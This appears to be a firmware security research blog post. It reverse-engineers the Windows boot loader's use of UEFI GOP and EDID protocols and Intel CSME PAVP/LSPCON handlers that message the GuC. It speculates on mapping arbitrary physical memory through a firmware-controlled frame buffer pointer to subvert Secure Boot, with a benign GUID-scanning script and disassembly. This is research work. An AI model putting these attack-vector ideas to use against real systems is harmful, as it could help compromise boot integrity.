((0xF6, 0x34, 0x0C, 0x1C, 0x80, 0xD3, 0xFA, 0x41, 0xA0, 0x49, 0x8A, 0xD0, 0x6C, 0x1A, 0x66, 0xAA), 'EFI_EDID_DISCOVERED_PROTOCOL_GUID'),
((0x1D, 0x3F, 0xF2, 0x6F, 0x7C, 0x87, 0x1B, 0x4B, 0x93, 0xFC, 0xF1, 0x42, 0xB2, 0xEE, 0xA6, 0xA7), 'GOP_DISPLAY_BRIGHTNESS_PROTOCOL_GUID'),
((0x3A, 0xD3, 0x1D, 0xF5, 0x7F, 0xE5, 0x20, 0x40, 0xB4, 0x66, 0xF4, 0xC1, 0x71, 0xC6, 0xE4, 0xF7), 'GOP_DISPLAY_BIST_PROTOCOL_GUID'),
#((0x00, 0xB2, 0xF5, 0x4C, 0xB8, 0x68, 0xA5, 0x4C, 0x9E, 0xEC, 0xB2, 0x3E, 0x3F, 0x50, 0x02, 0x9A), 'EFI_PCI_IO_PROTOCOL_GUID'),
#((0xBD, 0x7E, 0x1B, 0x65, 0x13, 0xCE, 0xD0, 0x41, 0x82, 0xE5, 0xA0, 0x63, 0xAB, 0xBE, 0x9B, 0xB6), 'GOP_COMPONENT_NAME2_PROTOCOL_GUID'),
((0xCD, 0x2F, 0xCB, 0xDB, 0x9A, 0xE2, 0x0E, 0x41, 0x9D, 0xD9, 0xFA, 0x9D, 0x5F, 0xF4, 0xCD, 0xA7), 'UNKNOWN_PROTOCOL_GUID'),
((0x3B, 0x70, 0xD4, 0xC7, 0x36, 0x0F, 0x51, 0x4E, 0xA9, 0x83, 0x5E, 0x61, 0xAC, 0xB8, 0x68, 0x3C), 'MAYBE_AUX_PROTOCOL_GUID?'),
#((0x91, 0x6E, 0x57, 0x09, 0x3F, 0x6D, 0xD2, 0x11, 0x8E, 0x39, 0x00, 0xA0, 0xC9, 0x69, 0x72, 0x3B), 'EFI_DEVICE_PATH_PROTOCOL_GUID'),
#((0xA1, 0x31, 0x1B, 0x5B, 0x62, 0x95, 0xD2, 0x11, 0x8E, 0x3F, 0x00, 0xA0, 0xC9, 0x69, 0x72, 0x3B), 'EFI_LOADED_IMAGE_PROTOCOL_GUID'),
#((0xAB, 0x31, 0xA0, 0x18, 0x43, 0xB4, 0x1A, 0x4D, 0xA5, 0xC0, 0x0C, 0x09, 0x26, 0x1E, 0x9F, 0x71), 'EFI_DRIVER_BINDING_PROTOCOL_GUID'),
#((0xFF, 0x5C, 0x7A, 0x6A, 0xD9, 0xE8, 0x70, 0x4F, 0xBA, 0xDA, 0x75, 0xAB, 0x30, 0x25, 0xCE, 0x14), 'EFI_COMPONENT_NAME2_PROTOCOL_GUID')
)

guids = { bytes(k) : v for k, v in GUIDS }
first_dwords = set([unpack("<I", guid[0:4]) for guid in guids.keys()])

for root in ('c:\\mnt\\iso', 'c:\\mnt\\boot', 'c:\\mnt\\install', 'c:\\mnt\\uefi'):
    for dir, _, files in walk(root):
        for file in files:
            filename = dir + '\\' + file
            try:
                filelen = path.getsize(filename) & ~15
                if filelen == 0:
                    continue
                with open(filename, 'rb') as file:
                    with mmap(file.fileno(), filelen, access=ACCESS_READ) as mem:
                        for ofs in range(0, filelen, 16):
                            if unpack("<I", mem[ofs:ofs+4]) in first_dwords:
                                guid = mem[ofs:ofs+16]
                                try:
                                    name = guids[guid]
                                    print(f'{filename}\t{ofs:x}\t{name}')
                                except KeyError:
                                    pass
            except PermissionError:
                pass

The UEFI setup and legacy components use the GOP and the EDID components:

c:\mnt\uefi\\AMITSE.efi	400	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\Bds.efi	3d0	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\ConSplitter.efi	310	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\CsmVideo.efi	2c0	EFI_EDID_DISCOVERED_PROTOCOL_GUID
c:\mnt\uefi\\CsmVideo.efi	2d0	EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\uefi\\CsmVideo.efi	320	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\GraphicsConsole.efi	2b0	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\Setup.efi	2e0	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\uefi\\UefiPxeBcDxe.efi	490	EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID

In Windows we have only:

c:\mnt\boot\Windows\Boot\EFI\bootmgfw.efi       a1a0    EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\Boot\EFI\bootmgfw.efi       a220    EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winload.efi        17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winload.efi        17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winresume.efi      122c00  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\winresume.efi      122c80  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winload.efi   17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winload.efi   17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winresume.efi 122bf0  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\boot\Windows\System32\Boot\winresume.efi 122c70  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\Boot\EFI\bootmgfw.efi    a1a0    EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\Boot\EFI\bootmgfw.efi    a220    EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\SecConfig.efi   110b80  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\SecConfig.efi   110c00  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winload.efi     17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winload.efi     17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winresume.efi   122c00  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\winresume.efi   122c80  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winload.efi        17e210  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winload.efi        17e2a0  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winresume.efi      122bf0  EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\install\Windows\System32\Boot\winresume.efi      122c70  EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID
c:\mnt\iso\bootx64.efi a1a0    EFI_EDID_ACTIVE_PROTOCOL_GUID
c:\mnt\iso\bootx64.efi a220    EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID

So basically most of the GOP DXE driver functions go unused and can be considered bloat...

Are EFI_GRAPHICS_OUTPUT_PROTOCOL and EFI_EDID_ACTIVE_PROTOCOL_GUID possible vectors for exploitation from UEFI -> Windows? Assume for example a DXE driver has a bug that can be exploited using specialized hardware, and you gain execution in the UEFI firmware during boot. Can these protocols be used as an attack surface against a Secure Boot Windows?

As seen before, EFI_GRAPHICS_OUTPUT_PROTOCOL has a driver-controlled Mode member:

struct _EFI_GRAPHICS_OUTPUT_PROTOCOL {
    EFI_GRAPHICS_OUTPUT_PROTOCOL_QUERY_MODE QueryMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_SET_MODE SetMode;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_BLT Blt;
    EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE *Mode;
};

In turn EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE is defined as:

typedef struct {
    UINT32 MaxMode;
    UINT32 Mode;
    EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *Info;
    UINTN SizeOfInfo;
    EFI_PHYSICAL_ADDRESS FrameBufferBase;
    UINTN FrameBufferSize;
} EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE;
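
To make the layout concrete, here is a small sketch that unpacks this structure from raw bytes. It assumes an x64 build, where pointers, UINTN and EFI_PHYSICAL_ADDRESS are all 8 bytes; the parse_gop_mode helper and every sample value are made up for illustration.

```python
import struct
from collections import namedtuple

GopMode = namedtuple(
    "GopMode", "MaxMode Mode Info SizeOfInfo FrameBufferBase FrameBufferSize"
)

# UINT32, UINT32, pointer, UINTN, EFI_PHYSICAL_ADDRESS, UINTN (x64 assumption)
GOP_MODE_FMT = "<IIQQQQ"

def parse_gop_mode(raw: bytes) -> GopMode:
    """Unpack an EFI_GRAPHICS_OUTPUT_PROTOCOL_MODE from a raw memory dump."""
    return GopMode._make(struct.unpack_from(GOP_MODE_FMT, raw))

# Synthetic dump (all values hypothetical): 3 modes, mode 1 active,
# a 36-byte info struct and a 1920x1080x32bpp frame buffer at 0xC0000000.
raw = struct.pack(
    GOP_MODE_FMT, 3, 1, 0x7F000000, 36, 0xC0000000, 1920 * 1080 * 4
)

mode = parse_gop_mode(raw)
print(f"FrameBufferBase={mode.FrameBufferBase:#x} size={mode.FrameBufferSize:#x}")
```

The two fields to keep an eye on are FrameBufferBase and FrameBufferSize: both are plain values filled in by whoever installed the protocol, and the consumer has no independent way to validate them.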

These structures are used in several functions inside the console library shared by all the relevant Windows components. The two main functions are ConsoleEfiGopOpen and ConsoleEfiGopEnable:

__int64 __fastcall ConsoleEfiGopOpen(CONSOLE_DATA *this)
{
  ...
  if ( EfiOpenProtocol(this->efi_handle, (__int64)&EfiGraphicsOutputProtocol, &gop_protocol) >= 0 )
  {
    status = EfiGopGetCurrentMode(gop_protocol, &mode, &mode_info);
    if ( status >= 0 )
    {
      orig_mode = mode;
      new_mode = mode;
      
      ... check if mode is allowed, if not get allowed mode ...
      
      // fill state with mode data
      is_rgb = mode_info.PixelFormat == PixelBlueGreenRedReserved8BitPerColor;
      this_1->gop_protocol = gop_protocol;
      this_1->new_mode = new_mode;
      this_1->orig_mode = orig_mode;
      if ( is_rgb )
        bits_per_pixel = 32;
      else if ( mode_info.PixelFormat == PixelBitMask )
        bits_per_pixel = 24;      
      else {
        status = STATUS_UNSUCCESSFUL;
        goto exit_handler;
      }
      this_1->orig_horiz_res = mode_info.HorizontalResolution;
      this_1->orig_vert_res = mode_info.VerticalResolution;
      pixels_per_scan_line = mode_info.PixelsPerScanLine;
      this_1->orig_bits_per_pixel = bits_per_pixel;
      result = 0i64;
      this_1->orig_pixels_per_scan_line = pixels_per_scan_line;
      return result;
      
    }
exit_handler:
    EfiCloseProtocol(this_1->efi_handle, &EfiGraphicsOutputProtocol);
    return (unsigned int)status;
  }
  return 0xC00000BB;
}

EfiGopGetCurrentMode() in turn uses MmArchTranslateVirtualAddress to get physical addresses for the output:

int __fastcall EfiGopGetCurrentMode(EFI_GRAPHICS_OUTPUT_PROTOCOL *gop, unsigned int *mode, EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *info)
{
  ...
  info_phys_addr = info;
  mode_phys_addr = mode;
  gop_phys_addr = gop;
  context_mode = *gCurrentExecutionContext;
  if ( *gCurrentExecutionContext != ExecutionContextFirmware )
  {
    if ( gop )
      status = MmArchTranslateVirtualAddress(gop, (unsigned __int64 *)&phys_addr, 0i64, 0i64);
    else
      status = 0;
    if ( !status )
      return STATUS_UNSUCCESSFUL;
    gop_phys_addr = phys_addr;
    is_mapped = mode_phys_addr ? MmArchTranslateVirtualAddress(
                                   mode_phys_addr,
                                   (unsigned __int64 *)&phys_addr,
                                   0i64,
                                   0i64) : 0;
    if ( !is_mapped )
      return STATUS_UNSUCCESSFUL;
    mode_phys_addr = (unsigned int *)phys_addr;
    is_mapped_2 = info_phys_addr ? MmArchTranslateVirtualAddress(
                                     info_phys_addr,
                                     (unsigned __int64 *)&phys_addr,
                                     0i64,
                                     0i64) : 0;
    if ( !is_mapped_2 )
      return STATUS_UNSUCCESSFUL;
    info_phys_addr = (EFI_GRAPHICS_OUTPUT_MODE_INFORMATION *)phys_addr;
    BlpArchSwitchContext(ExecutionContextFirmware);
  }
  *mode_phys_addr = gop_phys_addr->Mode->Mode;
  mode_info = gop_phys_addr->Mode->Info;
  *(_OWORD *)&info_phys_addr->Version = *(_OWORD *)&mode_info->Version;
  info_phys_addr->PixelInformation = mode_info->PixelInformation;
  info_phys_addr->PixelsPerScanLine = mode_info->PixelsPerScanLine;
  if ( context_mode != ExecutionContextFirmware )
    BlpArchSwitchContext(context_mode);
  return v3;
}

The most we can get from this is an arbitrary read from physical memory by Windows.

Let's look at ConsoleEfiGopEnable:

unsigned int __fastcall ConsoleEfiGopEnable(CONSOLE_DATA *this)
{
  ...
  status = EfiGopGetCurrentMode(this->gop_protocol, &old_mode, &mode_info);
  if ( status < 0 )
    return status;
  new_mode_1 = old_mode;
  if ( old_mode != new_mode )
  {  
    status = EfiGopSetMode(this_1->gop_protocol, new_mode);
    if ( status >= 0 )
    {
      BlDisplayInvalidateOemBitmap();
      EfiGopGetCurrentMode(this_1->gop_protocol, &mode, &mode_info);
      new_mode_1 = old_mode;
    }
  }
  
    if ( mode_info.PixelFormat == PixelBlueGreenRedReserved8BitPerColor )
        bits_per_pixel = 32;
    else if ( mode_info.PixelFormat == PixelBitMask )
        bits_per_pixel = 24;
    else { ...; return STATUS_UNSUCCESSFUL; }
    
    EfiGopGetFrameBuffer(this_1->gop_protocol, &frame_buffer_base, &frame_buffer_size);
    if ( BlMmMapPhysicalAddressEx(&frame_buffer, frame_buffer_base, frame_buffer_size, 8u, 0) >= 0
      || (status = BlMmMapPhysicalAddressEx(&frame_buffer, frame_buffer_base, frame_buffer_size, 1u, 0), status >= 0) )
    {
      this_1->frame_buffer = (void *)frame_buffer_1;
      this_1->frame_buffer_size = frame_buffer_size;
      this_1->bits_per_pixel = bits_per_pixel;
      this_1->horiz_res = mode_info.HorizontalResolution;
      ... continue filling this_1 with mode_info ...
      return result;
    }
  }
  return STATUS_UNSUCCESSFUL;

Here Windows maps the physical address supplied by GOP->FrameBuffer (retrieved in EfiGopGetFrameBuffer) into its own address space. Since we control FrameBuffer, we might be able to map arbitrary physical memory as the frame buffer.

How does that help us? If for example the OEM logo (specified in the 'BGRT' ACPI table) is copied to the FrameBuffer, we can write data under our control to a physical address under our control - after the bootmgr has already been verified as part of the Secure Boot process.

But this is tangential to this post, so we’ll examine this vector in a future post.

Part 2: From CSME

Now let's turn to the question of whether the CSME accesses the GuC and vice versa.

The CSME firmware is really big, so an exhaustive disassembly like the one we did for the GOP is less practical. So where might the CSME need to communicate with the GuC?

One place that comes to mind is PAVP - Protected Audio Video Path. This is the component that keeps protected HD content from being copied. The protection is implemented by creating a secure pipeline from the media components in the Windows kernel, through the GFX driver, and all the way to the display. The CSME is used to protect the pipeline, including certs, keys and much more.

We can start with the CSME HECI (Host Embedded Controller Interface) driver on Windows and find the relevant HECI messages. One group of interesting messages I found was for the LSPCON component. LSPCON stands for Level Shifter and Protocol Converter, which is used for HDR signalling over HDMI.

No hard work means no fish, so we go on a fishing expedition and finally manage to extract the PAVP component from an old CSME15 build. It's about 300KB in size, so still quite big.

Reversing this, I went down a deep rabbit hole. I finally discovered a function I named PAVP_init_heci, which is called from main, initializes the HECI communication module in PAVP and registers an interface with three functions:

  • handle async messages - PAVP_handle_async_message
  • HECI connection request - PAVP_connect
  • HECI disconnect request - PAVP_disconnect (all the names are mine)

PAVP_heci_handle_async_message() handles different types of messages like Widevine, asmf, PlayReady and so on. We are interested in CPHS - Intel Content Protection HECI Service - which is handled by a function I named PAVP_process_cphs_message(). Digging deeper we eventually reach the LSPCON command handler:

.text:0010775B ; int __cdecl LSPCON_command_handler(PavpCtx *ctx, void *heci_msg, int heci_msg_len, int max_out_len, int *out_len)
.text:0010775B LSPCON_command_handler proc near        ; CODE XREF: PAVP_heci_command_handler+8D↑p
.text:0010775B
.text:0010775B var_14          = dword ptr -14h
.text:0010775B msg_len         = dword ptr -10h
.text:0010775B ctx             = dword ptr  8
.text:0010775B heci_msg        = dword ptr  0Ch
.text:0010775B heci_msg_len    = dword ptr  10h
.text:0010775B max_out_len     = dword ptr  14h
.text:0010775B out_len         = dword ptr  18h
.text:0010775B
.text:0010775B cmd = ebx
.text:0010775B                 push    ebp
.text:0010775C                 mov     ebp, esp
.text:0010775E                 push    edi
.text:0010775F                 push    esi
.text:00107760                 push    cmd
.text:00107761                 sub     esp, 8
.text:00107764                 mov     eax, [ebp+heci_msg_len]
.text:00107767                 mov     ecx, [ebp+ctx]
.text:0010776A                 mov     [ebp+msg_len], eax
.text:0010776D                 mov     eax, [ebp+max_out_len]
.text:00107770                 mov     cmd, [ebp+heci_msg]
.text:00107773                 mov     [ebp+var_14], eax
.text:00107776                 mov     esi, [ebp+out_len]
.text:00107779                 test    ecx, ecx
.text:0010777B                 jz      short err_cmd_not_in_range
.text:0010777D                 cmp     [ecx+PavpCtx.Lspcon], 0
.text:00107781                 jz      short err_cmd_not_in_range
.text:00107783                 test    cmd, cmd
.text:00107785                 setz    dl
.text:00107788                 test    esi, esi
.text:0010778A                 setz    al
.text:0010778D                 or      dl, al
.text:0010778F                 jnz     short err_cmd_not_in_range
.text:00107791                 cmp     [ebp+msg_len], 0Fh ; cmd_len <= sizeof(LSPCON_heci_command_header_t)
.text:00107795                 ja      short is_cmd_id_in_heci_range

It begins by verifying the command buffer is big enough to fit the LSPCON HECI command header:

00000000 LSPCON_heci_command_header_t struc ; (sizeof=0x10, mappedto_125)
00000000                                         ; XREF: LSPCON_HECICMD_PLAYBACK_DONE_IN/r
00000000                                         ; LSPCON_HECICMD_PLAYBACK_DONE_OUT/r ...
00000000 version         dd ?
00000004 cmdid           dd ?                    ; XREF: LSPCON_command_handler:is_cmd_id_in_heci_range/r
00000008 status          dd ?
0000000C size            dd ?                    ; XREF: LSPCON_command_handler+6B/w
0000000C                                         ; LSPCON_command_handler+91/w ...
00000010 LSPCON_heci_command_header_t ends
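
As a rough illustration of the header check, here is a minimal Python sketch that parses the 0x10-byte header and rejects shorter buffers. It assumes little-endian fields (the CSME core is x86); the function name and the sample values are hypothetical and only serve the example.

```python
import struct

# Layout from the IDA struct above: four little-endian dwords, 0x10 bytes total.
HEADER = struct.Struct("<4I")

def parse_lspcon_header(msg: bytes):
    """Return (version, cmdid, status, size), or None if msg is too short."""
    # Mirrors `cmp msg_len, 0Fh / ja`: only buffers longer than 0xF bytes pass.
    if len(msg) <= 0x0F:
        return None
    return HEADER.unpack_from(msg, 0)

# Sample buffer; the field values are made up for illustration.
sample = struct.pack("<4I", 1, 0xE005, 0, 0)
```

The cmdid field at offset 4 is what the next check in the handler looks at.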

Next it checks that the command is one of the 7 LSPCON HECI commands and retrieves the appropriate handler from a global handler list:

.text:001077B8 is_cmd_id_in_heci_range:                ; CODE XREF: LSPCON_command_handler+3A↑j
.text:001077B8                 mov     edi, [cmd+LSPCON_heci_command_header_t.cmdid]
.text:001077BB                 lea     eax, [edi-0E000h] ; eax = id - 0xE000; passes if 0xE000 <= id <= 0xE007
.text:001077C1                 cmp     eax, 7
.text:001077C4                 jbe     short get_handler
                               ...
.text:001077D4 get_handler:                            ; CODE XREF: LSPCON_command_handler+69↑j
.text:001077D4                 mov     edx, dword ptr ds:gLSPCONCmdHandlerTable[eax*8] ; gLSPCONCmdHandlerTable.HandleFunc
.text:001077DB                 test    edx, edx        ; EDX contains handler
.text:001077DD                 jnz     short check_cmd_data
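
The lea/cmp/jbe sequence is the usual compiler trick of doing a two-sided range check with a single unsigned compare. A small Python model of it, with a hypothetical function name, might look like this:

```python
def cmd_index(cmdid: int):
    """Model `lea eax, [edi-0E000h] / cmp eax, 7 / jbe get_handler`."""
    # The subtraction wraps around in a 32-bit register, so ids below 0xE000
    # become huge unsigned values and fail the compare.
    idx = (cmdid - 0xE000) & 0xFFFFFFFF
    # jbe is an unsigned "below or equal", so indexes 0 through 7 are accepted.
    return idx if idx <= 7 else None
```

Index 0 passes this range check as well; it is only rejected afterwards by the NULL-handler test (`test edx, edx`).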

The global list looks something like:

gLSPCONCmdHandlerTable[] = {
      { 0 },
      { LSPCON_get_status,             sizeof(LSPCON_HECICMD_GET_LSPCON_STATUS_IN),    sizeof(LSPCON_HECICMD_GET_LSPCON_STATUS_OUT)},
      { LSPCON_set_dev_cert,           sizeof(LSPCON_HECICMD_SET_LSPCON_CERT_IN),      sizeof(LSPCON_HECICMD_SET_LSPCON_CERT_OUT)},
      { LSPCON_init_session,           sizeof(LSPCON_HECICMD_INIT_SESSION_IN),         sizeof(LSPCON_HECICMD_INIT_SESSION_OUT)},
      { LSPCON_init_limits,            sizeof(LSPCON_HECICMD_INIT_LIMITS_IN),          sizeof(LSPCON_HECICMD_INIT_LIMITS_OUT)},
      { LSPCON_playback_done,          sizeof(LSPCON_HECICMD_PLAYBACK_DONE_IN),        sizeof(LSPCON_HECICMD_PLAYBACK_DONE_OUT)},
      { LSPCON_ack,                    sizeof(LSPCON_HECICMD_MSG_ACK_IN),              sizeof(LSPCON_HECICMD_MSG_ACK_OUT)},
      { LSPCON_get_topology,           sizeof(LSPCON_HECICMD_GET_TOPOLOGY_IN),         sizeof(LSPCON_HECICMD_GET_TOPOLOGY_OUT)},
  };

After verifying the size of the input and output structs, the actual command handler is called.

.text:001077FD
.text:001077FD check_cmd_data:                         ; CODE XREF: LSPCON_command_handler+82↑j
.text:001077FD                 movzx   edi, word ptr ds:unk_82364[eax*8] ; gLSPCONCmdHandlerTable.InputSize
.text:00107805                 cmp     edi, [ebp+msg_len]
.text:00107808                 ja      short sizes_error
.text:0010780A                 movzx   eax, word ptr ds:unk_82366[eax*8] ; gLSPCONCmdHandlerTable.OutputSize
.text:00107812                 cmp     eax, [ebp+var_14]
.text:00107815                 ja      short sizes_error
                               ...
.text:00107830
.text:00107830 loc_107830:                             ; CODE XREF: LSPCON_command_handler+C5↑j
.text:00107830                 push    cmd
.text:00107831                 push    ecx
                               ...
.text:00107846                 call    edx             ; Call Command Handler!
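
Putting the table lookup and the size checks together, the dispatcher can be modelled roughly as below. This is a sketch under assumptions: the error codes, the dummy handler and the 0x10 sizes in the sample table are placeholders, since the real values are not visible in the listing. Only the 8-byte entry shape (handler pointer plus two 16-bit sizes) and the order of the checks come from the disassembly.

```python
from typing import Callable, NamedTuple, Optional

ERR_BAD_COMMAND, ERR_BAD_SIZE = -1, -2   # placeholder error codes

class Entry(NamedTuple):
    handler: Optional[Callable[[object, bytes], int]]  # dword at entry offset +0
    in_size: int                                       # word at entry offset +4
    out_size: int                                      # word at entry offset +6

def dispatch(table, ctx, msg: bytes, cmdid: int, max_out_len: int) -> int:
    idx = (cmdid - 0xE000) & 0xFFFFFFFF
    if idx > 7:                       # cmp eax, 7 / jbe
        return ERR_BAD_COMMAND
    entry = table[idx]
    if entry.handler is None:         # test edx, edx
        return ERR_BAD_COMMAND
    if entry.in_size > len(msg):      # cmp edi, [ebp+msg_len] / ja
        return ERR_BAD_SIZE
    if entry.out_size > max_out_len:  # cmp eax, [ebp+var_14] / ja
        return ERR_BAD_SIZE
    return entry.handler(ctx, msg)    # call edx

def _dummy_handler(ctx, msg):
    return 0

# Hypothetical table: entry 0 is empty, the other seven share a dummy handler.
TABLE = [Entry(None, 0, 0)] + [Entry(_dummy_handler, 0x10, 0x10) for _ in range(7)]
```

Note that both size checks only enforce a minimum: a message longer than the expected input struct still reaches the handler.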

Reversing all the command handlers, we find something interesting in the most unexpected one (and thus the last one I reversed): LSPCON_playback_done(). It took me a while to even understand that it's related to the GuC, and I’ll explain later how I made that connection.

What does LSPCON_playback_done do? It checks whether HDCP restrictions should remain in place after a playback is complete.

The function begins by verifying the input parameter (LSPCON_HECICMD_PLAYBACK_DONE_IN) is valid:

.text:00107C6B ; int __cdecl LSPCON_playback_done(PavpCtx *ctx, void *msg)
.text:00107C6B LSPCON_playback_done proc near
.text:00107C6B
.text:00107C6B cur_hdcp_requirements= dword ptr -18h
.text:00107C6B count_active_sessions= dword ptr -14h
.text:00107C6B var_10          = dword ptr -10h
.text:00107C6B ctx             = dword ptr  8
.text:00107C6B msg             = dword ptr  0Ch
.text:00107C6B
.text:00107C6B ctx_ptr = edi
.text:00107C6B                 push    ebp
.text:00107C6C                 mov     ebp, esp
.text:00107C6E                 push    ctx_ptr
.text:00107C6F                 push    esi
.text:00107C70                 push    ebx
.text:00107C71                 sub     esp, 0Ch
.text:00107C74                 mov     [ebp+count_active_sessions], 0
.text:00107C7B                 mov     esi, [ebp+msg]
.text:00107C7E                 mov     eax, ds:stack_cookie_ptr
.text:00107C83                 mov     [ebp+var_10], eax
.text:00107C86                 xor     eax, eax
.text:00107C88                 mov     ctx_ptr, [ebp+ctx]
.text:00107C8B                 test    esi, esi
.text:00107C8D                 jnz     short check_valid_header
                               ...
.text:00107C99 check_valid_header:                     ; CODE XREF: LSPCON_playback_done+22↑j
.text:00107C99                 mov     [esi+LSPCON_HECICMD_PLAYBACK_DONE_IN.header.size], 0
.text:00107CA0                 test    ctx_ptr, ctx_ptr
.text:00107CA2                 jz      short invalid_parameter
.text:00107CA4                 cmp     [ctx_ptr+PavpCtx.Lspcon], 0
.text:00107CA8                 jz      short invalid_parameter

And now comes the interesting part:

.text:00107CAA                 lea     eax, [ebp+count_active_sessions]
.text:00107CAD                 push    eax             ; num_active_sessions
.text:00107CAE                 push    0               ; type
.text:00107CB0                 push    ctx_ptr         ; ctx
.text:00107CB1                 call    GUC_get_active_sessions ; 
.text:00107CB6                 add     esp, 0Ch
.text:00107CB9                 mov     ebx, eax
.text:00107CBB                 test    eax, eax
.text:00107CBD                 jz      short got_active_sessions

If there are any remaining active sessions, the code continues to check what level of HDCP protection they require and sets the protection to that level if it is lower than the current level. I won’t go into that disassembly as it's not really interesting.

Why do I think GUC_get_active_sessions is actually related to the GuC, and why did I name it that? Let's continue by examining this function. It's just a wrapper around a function I called GUC_send_message that sends message no. 6:

.text:0010452C ; int __cdecl GUC_get_active_sessions(PavpCtx *ctx, int type, unsigned int *num_active_sessions)
.text:0010452C GUC_get_active_sessions proc near       ; CODE XREF: LSPCON_playback_done+46↓p
.text:0010452C
.text:0010452C guc2csme        = GUC2CSME_MSG ptr -18h
.text:0010452C csme2guc        = CSME2GUC_MSG ptr -10h
.text:0010452C ctx             = dword ptr  8
.text:0010452C type            = dword ptr  0Ch
.text:0010452C num_active_sessions= dword ptr  10h
.text:0010452C
.text:0010452C ctx_ptr = esi
                               ...
.text:0010455B type_ok:
.text:0010455B                 mov     dword ptr [ebp+csme2guc.command], GUC_MSG_GET_ACTIVE_SESSIONS ; =6
.text:00104562                 mov     [ebp+csme2guc.data1], al
.text:00104565                 lea     eax, [ebp+guc2csme.value]
.text:00104568                 mov     [ebp+guc2csme.value], 0
.text:0010456F                 push    eax             ; guc2csme
.text:00104570                 lea     eax, [ebp+csme2guc]
.text:00104573                 push    eax             ; csme2guc
.text:00104574                 push    ctx_ptr         ; ctx
.text:00104575                 call    GUC_send_message

GUC_send_message() gets two parameters in addition to the PAVP context: a CSME2GUC structure and a GUC2CSME structure. How does it work? It tries to send the message several times in a loop, each time waiting for a short timeout. The first iteration of the loop also wakes the GuC by enabling it through management functions (if it isn’t already enabled), and sending a special wake message using a function I named GUC_send_VDM().

.text:001041FF ; int __cdecl GUC_send_message(PavpCtx *ctx, CSME2GUC_MSG *csme2guc, GUC2CSME_MSG *guc2csme)
.text:001041FF GUC_send_message proc near              ; CODE XREF: GUC_get_active_sessions+49↓p
.text:001041FF                                         ; sub_1045C5+3F↓p
.text:001041FF
.text:001041FF ctx             = dword ptr  8
.text:001041FF csme2guc        = dword ptr  0Ch
.text:001041FF guc2csme        = dword ptr  10h
.text:001041FF
.text:001041FF attempt = esi
.text:001041FF ctx_ptr = ebx
.text:001041FF                 push    ebp
.text:00104200                 mov     ebp, esp
.text:00104202                 push    edi
.text:00104203                 push    attempt
.text:00104204                 xor     attempt, attempt
.text:00104206                 push    ctx_ptr
.text:00104207                 mov     ctx_ptr, [ebp+ctx]
.text:0010420A
.text:0010420A send_loop:                              ; CODE XREF: GUC_send_message+A3↓j
.text:0010420A                 inc     attempt
.text:0010420B                 cmp     attempt, 1
.text:0010420E                 jnz     short send_wake_msg_loop
.text:00104210
.text:00104210 first_attempt:
.text:00104210                 push    ctx_ptr
.text:00104211                 call    GUC_disable_power_gate?
.text:00104216                 mov     edi, eax
.text:00104218                 pop     eax
.text:00104219                 test    edi, edi
.text:0010421B                 jnz     loc_1042A8
.text:00104221
.text:00104221 send_wake_msg_loop:                     ; CODE XREF: GUC_send_message+F↑j
.text:00104221                                         ; GUC_send_message+4E↓j
.text:00104221                 push    VDM_CSME_TO_GUC_WAKE_REQ
.text:00104223                 push    0               ; msg
.text:00104225                 push    ctx_ptr
.text:00104226                 call    GUC_send_VDM    ; VDM == Vendor Defined Message?
.text:0010422B                 add     esp, 0Ch
.text:0010422E                 mov     edi, eax
.text:00104230                 test    eax, eax
.text:00104232                 jnz     msg_error
.text:00104238                 push    [ebp+guc2csme]
.text:0010423B                 push    GUC_IS_AWAKE
.text:0010423D                 push    ctx_ptr
.text:0010423E                 call    GUC_wait_for_message ; wait for GUC is awake message
.text:00104243                 add     esp, 0Ch
.text:00104246                 mov     edi, eax
.text:00104248                 cmp     eax, PAVP_STATUS_TRY_AGAIN
